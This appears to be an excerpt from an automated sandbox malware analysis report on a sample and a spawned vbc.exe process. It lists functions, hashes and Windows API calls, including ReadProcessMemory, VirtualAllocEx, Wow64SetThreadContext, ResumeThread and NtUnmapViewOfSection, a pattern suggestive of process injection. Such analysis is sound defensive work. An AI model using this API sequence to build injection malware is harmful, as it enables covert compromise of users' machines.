Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 98f90b965af29da94478edbd737576895221f692f0f37c9c6a5a5c70dd5f5ee6
Instruction ID: b13da76632888f3d7c63b5ac2ae847993405c5c55c396b4b4eb687a7caaefe4f
Opcode Fuzzy Hash: 98f90b965af29da94478edbd737576895221f692f0f37c9c6a5a5c70dd5f5ee6
Instruction Fuzzy Hash: 65213971D003499FDB10CFAAC885BEEBBF5FF48310F50842AE918A7240D778A954DBA0

Function 04AE6F78 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AE7000

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4264a9d6a2a5ecaf03f41d99c5fc4b42f8f6eb5e94623a9a082ab8579fdf9c93
Instruction ID: a3b8c1ddd03d40d56f372fb724ea4a2f7d8c2deaf412a296684a0fe5cdf2f733
Opcode Fuzzy Hash: 4264a9d6a2a5ecaf03f41d99c5fc4b42f8f6eb5e94623a9a082ab8579fdf9c93
Instruction Fuzzy Hash: 75214AB6D003499FDB10CFA9C981AEEBBF5FF48320F14842AD518A3240D7789541DBA0

Function 012AD5C9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012AD657

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4a25eb2c8eee4092f612f8b36ec354ee7906400c99c429e91ad8da3827a59d66
Instruction ID: e12d134a9e8d54beb1feeadf537411c3416eef1642a78f209bcf7561635a9b66
Opcode Fuzzy Hash: 4a25eb2c8eee4092f612f8b36ec354ee7906400c99c429e91ad8da3827a59d66
Instruction Fuzzy Hash: 0221E3B59012499FDB10CFAAD984ADEBFF4EB48310F14801AE918A3250D374A950CFA5

Function 04AE6CF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AE6D76

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 328dd22907befcaef8419c4215c767c03bd7842c9fdaab07c092359959ca23e3
Instruction ID: 84be7035f53f3782acff88fdc5c8a4109c69035b76cdc7f2ccd3a39d566bddb0
Opcode Fuzzy Hash: 328dd22907befcaef8419c4215c767c03bd7842c9fdaab07c092359959ca23e3
Instruction Fuzzy Hash: 1F214971D003098FDB10DFAAC4857EEBBF4EF58320F54842AD519A7241DB78A944CFA1

Function 04AE6CF3 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AE6D76

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eb2a0dddca8917ff8377eea6bee25b8840d892d5874bfe5d1aee43efbe0a52b6
Instruction ID: 8ad8cd28971ec1d384651aeeae0b0f9977c96446e65f234cf29d8813cb4e9875
Opcode Fuzzy Hash: eb2a0dddca8917ff8377eea6bee25b8840d892d5874bfe5d1aee43efbe0a52b6
Instruction Fuzzy Hash: CE2137B1D006098FDB10DFAAC5857EEBBF4EF58320F54842AD519A7241DB78A945CFA0

Function 04AE6F80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AE7000

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8747e1a5dec1daea14c489d2fe995914170946731538f2164e2443187e2bbbe9
Instruction ID: 3186ca4a8b7782007478848b37c9304156ebf3e5cade31cd771151fb5199cf84
Opcode Fuzzy Hash: 8747e1a5dec1daea14c489d2fe995914170946731538f2164e2443187e2bbbe9
Instruction Fuzzy Hash: 832139B1D003499FDB10DFAAC881AEEFBF5FF48320F10842AE519A7241D7759940DBA0

Function 012AD5D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012AD657

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d8f6443b579abafd2e5659417ab70b9790a1e1df807430f97e1c367fcd9b2c65
Instruction ID: 22d9ed82062155a90e2fd821e159f3c3c9e7a399c9d4744d66ca3829a29f29c2
Opcode Fuzzy Hash: d8f6443b579abafd2e5659417ab70b9790a1e1df807430f97e1c367fcd9b2c65
Instruction Fuzzy Hash: 4421B0B59002499FDB10CFAAD984ADEBBF8EB48320F14841AE918A3250D374A954DFA5

Function 012AB158 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AAFB9,00000800,00000000,00000000), ref: 012AB1CA

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4e67c463cc2a8a340922824280472bb27ab099593f5634c6fb6266e12a49ff01
Instruction ID: 4b60419cb78bf4ddf18ae94cfdc2c221109a7cf5882c445db13b551ec7261690
Opcode Fuzzy Hash: 4e67c463cc2a8a340922824280472bb27ab099593f5634c6fb6266e12a49ff01
Instruction Fuzzy Hash: D21103B69102098FDB10CFAAC884ADEFBF4EB89310F10842ED919A7200C375A645CFA5

Function 012AA070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AAFB9,00000800,00000000,00000000), ref: 012AB1CA

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 41caf7987067c06ece504a22c3c3b382fa6956718cfa49969c5c8dbdcfddab09
Instruction ID: fe1def695e88d1abc20d4e33dae997848855db8a8ae95ca1e6b94c602628b82b
Opcode Fuzzy Hash: 41caf7987067c06ece504a22c3c3b382fa6956718cfa49969c5c8dbdcfddab09
Instruction Fuzzy Hash: EE1114B6D143099FDB10CF9AC848ADEFBF4EB89310F50842EE519A7200C375A945CFA4

Function 04AE6DC8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AE6E3E

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f46f2344ed8f0ce72603822a8dbb5dc077aa4eeeca6031800d237f887c84b306
Instruction ID: d805edde02043d55b66c81dd4b26b13e93575c840d3fe82a1689acd1032b781e
Opcode Fuzzy Hash: f46f2344ed8f0ce72603822a8dbb5dc077aa4eeeca6031800d237f887c84b306
Instruction Fuzzy Hash: 7C1156B6D00249CFDB10DFA9C944BEEBBF5EF58320F14881AE519A7250DB359940CBA0

Function 04AE6DD0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AE6E3E

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9483cf9a36930327c26ad00e40e2632d2e8a0f5d568f4be0a76c902a17bcce42
Instruction ID: 570d64c6cb6567c999cc8d5160b021d859e6dd9cf7da657a71cbdf25abd81b39
Opcode Fuzzy Hash: 9483cf9a36930327c26ad00e40e2632d2e8a0f5d568f4be0a76c902a17bcce42
Instruction Fuzzy Hash: 1D1126729003499FDB10DFAAC844AEFBBF5EF98320F148819E519A7250CB75A944DBA0

Function 04AE6C48 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04AE6CAA

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 220fbbb8ee4c92f2f82f2b729de5b85be7c6e4ba045feec93cc1bc78baaa1cfc
Instruction ID: 332ff1f1fa5a898005cc503f3affb603580d44506dec8668335ac9540393d672
Opcode Fuzzy Hash: 220fbbb8ee4c92f2f82f2b729de5b85be7c6e4ba045feec93cc1bc78baaa1cfc
Instruction Fuzzy Hash: D9113A71D003498FDB20DFAAC8457AEFBF4EF98320F148419D519A7240CB75A944CBA4

Function 04AE6C43 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04AE6CAA

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d94b3e0da87a39d599bb2766f1f7c8c3bee4a4a6456bb02582e81ef0b14f7556
Instruction ID: da379ebfe8c5d1f2515d5922cde014be9ac86aaad46f72d7639d5f207199c5bb
Opcode Fuzzy Hash: d94b3e0da87a39d599bb2766f1f7c8c3bee4a4a6456bb02582e81ef0b14f7556
Instruction Fuzzy Hash: 88116AB5D003488FDB10DFAAC9857EEFBF5EF98320F24881AC519A7240CB35A545CBA4

Function 04AE8E4C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 04AEAD25

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fe267fc8130ae63b8b18844d83f7e557006f0390183f146f16f0dc0b3cefbc8c
Instruction ID: 856119fbba1021981ebd1ccd7b46eb67f34e6a2ffc0964e11f6c18c79c601a79
Opcode Fuzzy Hash: fe267fc8130ae63b8b18844d83f7e557006f0390183f146f16f0dc0b3cefbc8c
Instruction Fuzzy Hash: 731106B5800349DFDB10DF9AC985BEEBBF8EB58320F108419E518A7200D375A944CFA1

Function 012AAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF3E

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 732a87551be9a13bb2645eb26c8f6a417c28685657ac020b4ecd2cda72b03959
Instruction ID: eb72762ba9c7d0b2129d9bdc2872d63503371472682defee46040c9871c0818a
Opcode Fuzzy Hash: 732a87551be9a13bb2645eb26c8f6a417c28685657ac020b4ecd2cda72b03959
Instruction Fuzzy Hash: 8111E0B6C003498FDB24CF9AD844ADEFBF8EF88324F14846AD519A7250D379A545CFA1

Function 00F6D110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de19a7fed2d8d022e628c1af9a6c712fd0c02109a4047756bbd1a234c607aa41
Instruction ID: 3ad2209e314d18b0e940866f55a8260001806ce3c20a404c392c33d86ee01a2a
Opcode Fuzzy Hash: de19a7fed2d8d022e628c1af9a6c712fd0c02109a4047756bbd1a234c607aa41
Instruction Fuzzy Hash: 38216772E04200DFEB15DF04C9C0B27BF66FB99324F24C569E8090B246C37AD806E7A1

Function 00F6D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3777110c452f6be7d8c7cd077354a7714d5ebabe234aa6d9daea24155011ee51
Instruction ID: 759c6801c85d2efd062492932ad154cbc40e7c78fc817a2d0be3f39e9d5b4d2a
Opcode Fuzzy Hash: 3777110c452f6be7d8c7cd077354a7714d5ebabe234aa6d9daea24155011ee51
Instruction Fuzzy Hash: BA214872A04244DFCB05DF04C9C0B16BF65FB98324F24C568D8090B24AC736EC06E6A2

Function 00F7D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ff7bf43b281114ca040a22304f487d4475acbedea57af29e9b0af25a5d2557
Instruction ID: bd7f6df7b0bd62c367a32f9103cc96dff2aac12859f46f3587b12469c4678a68
Opcode Fuzzy Hash: 36ff7bf43b281114ca040a22304f487d4475acbedea57af29e9b0af25a5d2557
Instruction Fuzzy Hash: B921D371A042049FDB05DF14D980B26BB75FF88324F64C56ED90D4B256C336D806DA62

Function 00F7D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8359215a19a1f9e6a478b8d2bdb23658bfc17ede704ceb3a9cc15b8b0e4a2751
Instruction ID: ac0dd9ba7ff8314c71ea456dea8dcea42933085512e0e0d0ad60d1e90ae18fc7
Opcode Fuzzy Hash: 8359215a19a1f9e6a478b8d2bdb23658bfc17ede704ceb3a9cc15b8b0e4a2751
Instruction Fuzzy Hash: 9821F276604200DFCB15DF14D984B26BB75EF88324F64C96ED80E4B28AC33AD807DA62

Function 00F7D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9a9d5c33f0f5b6edc063ac068b5ab018fa17f273f69076c1bad5014d9dfedb
Instruction ID: 389cf3e9e334c54108b10fde1eb84c02efdc675e0fbddeff40253d59e20493f9
Opcode Fuzzy Hash: ca9a9d5c33f0f5b6edc063ac068b5ab018fa17f273f69076c1bad5014d9dfedb
Instruction Fuzzy Hash: C42150755093808FDB12CF24D994715BF71EF46324F28C5EBD8498B6A7C33A980ADB62

Function 00F6D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: bc2fbe61698e24c2bf83eb298bb415be0a97bc7400ef344d2e60da8de99442eb
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: D2112676904240CFCB06CF00D5C4B16BF71FB94324F24C2A9D8090B256C33AE85ADBA1

Function 00F6D10B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: ef85b46a504b9f8992403a7f723e377abf146f8e6750ccce5c6bfdad0467bdca
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 70112676904240CFDB12CF00D9C4B16BF72FB95324F24C1A9D8094B256C33AD85ADBA1

Function 00F7D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 5703059746f92929793ca553ee62c0cd185b15ed1b7a28917aa7d4445feebfc3
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: FE11BB75904280DFCB06CF10C9C4B15BBB1FF84324F28C6AED8494B296C33AD81ADB62

Function 00F6D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6f5b75980577bf6b4ae228b6e24aaaae67b48521f4759dea6696c58040b023
Instruction ID: 4cee382bc4394981c3c189d38f97cf56034d5b4394f9abaa86f7ea72ddec3da2
Opcode Fuzzy Hash: 8c6f5b75980577bf6b4ae228b6e24aaaae67b48521f4759dea6696c58040b023
Instruction Fuzzy Hash: E601DB72A053449FE7119A15CDC4766FFE8EF51334F18C45AED094A286C3799840E6B2

Function 00F6D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc84535f5d2f85d85aa08bae0dfe586102f29db3a04656acae17b0815678fe10
Instruction ID: 3c8570c0f70776189ecb50b08fe6f432024c43f1de0ed5e8b9e506f278e15f64
Opcode Fuzzy Hash: dc84535f5d2f85d85aa08bae0dfe586102f29db3a04656acae17b0815678fe10
Instruction Fuzzy Hash: 0BF062729053449FE7208E16DD84B66FFA8EF51734F18C45AED484B286C3799844DAB1

Analysis Process: vbc.exePID: 5456, Parent PID: 2892COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.3%
Total number of Nodes:	517
Total number of Limit Nodes:	9

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
GetProcAddress.KERNEL32(00000000), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000), ref: 0041CD07
LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
GetProcAddress.KERNEL32(00000000), ref: 0041CD4C

Strings

SetProcessDEPPolicy, xrefs: 0041CC13
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
RmRegisterResources, xrefs: 0041CD1E
NtSuspendProcess, xrefs: 0041CC9C
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
GetMonitorInfoW, xrefs: 0041CC4F
Shlwapi, xrefs: 0041CC79
EnumDisplayMonitors, xrefs: 0041CC3B
GetConsoleWindow, xrefs: 0041CC88
GlobalMemoryStatusEx, xrefs: 0041CBC8
RmEndSession, xrefs: 0041CD3E
GetExtendedTcpTable, xrefs: 0041CCBC
Kernel32, xrefs: 0041CB80
NtUnmapViewOfSection, xrefs: 0041CBB8
GetExtendedUdpTable, xrefs: 0041CCD1
IsWow64Process, xrefs: 0041CBD7
NtQueryInformationProcess, xrefs: 0041CCE1
IsUserAnAdmin, xrefs: 0041CBFF
GetComputerNameExW, xrefs: 0041CBEB
NtResumeProcess, xrefs: 0041CCAC
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
Psapi, xrefs: 0041CB60
RmStartSession, xrefs: 0041CD09
EnumDisplayDevicesW, xrefs: 0041CC27
GetFinalPathNameByHandleW, xrefs: 0041CCF5
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
RmGetList, xrefs: 0041CD2E
shcore, xrefs: 0041CB95
GetSystemTimes, xrefs: 0041CC63
Shell32, xrefs: 0041CC04
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
